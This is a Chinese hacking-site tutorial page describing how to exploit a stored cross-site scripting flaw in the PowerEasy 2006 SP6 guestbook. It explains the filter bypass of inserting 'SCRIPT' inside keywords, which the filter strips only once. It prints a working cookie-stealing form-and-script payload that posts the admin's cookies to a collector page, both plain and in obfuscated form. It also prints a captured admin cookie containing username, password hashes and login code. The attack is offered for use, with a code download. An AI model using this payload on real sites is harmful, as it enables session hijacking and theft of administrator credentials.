arow 您现在的位置: Yes!黑客联盟 >> 教程下载 >> 动画教程 >> 漏洞利用 >> 教程信息
漏洞利用教程列表
动易2006 SP6最新漏洞得到管理员密码
运行环境: Win9x/NT/2000/XP/2003
软件等级: ★★★
文件大小: 6500 K
软件属性:       
软件录入: YesHack.Com
添加时间: 2007-10-1 10:54:22
::软件简介::

动画内任何广告皆为作者个人行为,网络交易,风险自担

OK 进入正题
我在8月的黑防杂志上看到了有关介绍动易2006 SP6跨站漏洞的介绍,在此详细说明一下如何使用
这是我刚刚装上的动易2006 SP6
不好意思 机子有点卡
晕 忘启动IIS了
等...
修改conn.asp
好了 安装完成
漏洞主要出现在“雁过留声(留言板)”、“信息管理”和“短消息”里,这里以留言板为例
下面我们来测试一下漏洞
打开留言板,选择源代码模式签写留言
审核发表状态下钓到管理员Cookies的几率比较到
我们先来试试一些文字
输入<>未被过滤
输入<script>过滤成<>,不好意思 刚才弄错了
输入scrSCRIPTipt会过滤成script(去掉了中间的大写SCRIPT)
漏洞出来了
也就是说它会把"Script"字符过滤掉,但是只过滤一次,给了我们可乘之机
(iframe标签你可以自己测试)
下面是一个获得Cookies的代码,会把Cookies提交到http://localhost/cookies/cookies.asp,相关的代码我会打包到教程里

<form name=redir action=http://localhost/cookies/cookie.asp method=post>
<input type=hidden name=cookie>
<input type=hidden name=url>
<input type=hidden name=hostname>
</form>
<script>redir.cookie.value=document.cookie;redir.url.value=location.href;redir.hostname.value=location.hostname;redir.submit();</script>
现在我们在一些可能的敏感字符中插入SCRIPT字符,以防我们的代码被过滤
更改后的代码如下:
<FOSCRIPTRM naSCRIPTme=redSCRIPTir actSCRIPTion=http://locaSCRIPTlhost/cooSCRIPTkies/cooSCRIPTkie.asp>
<input type=hidSCRIPTden name=coSCRIPTokie>
<input type=hidSCRIPTden name=uSCRIPTrl>
<input type=hidSCRIPTden name=hoSCRIPTstname>
</forSCRIPTm>
<scrSCRIPTipt>rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();</scrSCRIPTipt>
现在我们发表留言

看 数据库里的代码是我们修改前的代码
现在以管理员身份登录
现在我们保存cookies的数据库是空的
这是我发送的钓Cookies的网页

好的,现在代码已经执行,管理员的Cookies已经被我们钓到了
我们来看一下
ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd&UserName=admin&AdminLoginCode=PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8
怎么样?得到了吧?
里面有管理员的用户名、密码,和管理认证码

信息管理和短消息也可以如法炮制,具体方法我就不多说了
在这里说一下 拿到源码后先要修改一下设置,conn.asp里的数据库路径要改一下
还有test.htm里的URL也要改一下,可以用它做测试

 

如果您对该软件的使用或者其他方面存在问题,请点击【此处进入论坛】讨论!
::下载地址::
1.推荐快车高速下载:下载地址1

2.HTTP普通下载:下载地址1  下载地址2  
如果您发现该软件不能下载,请通知点击【此处报错】,谢谢!
相关资源搜索:
::下载说明::
为了达到最快的下载速度,推荐使用网际快车下载本站软件。
未经本站许可,任何网站不得盗链及抄袭本站资源;如引用页面,请注明来自本站,谢谢支持!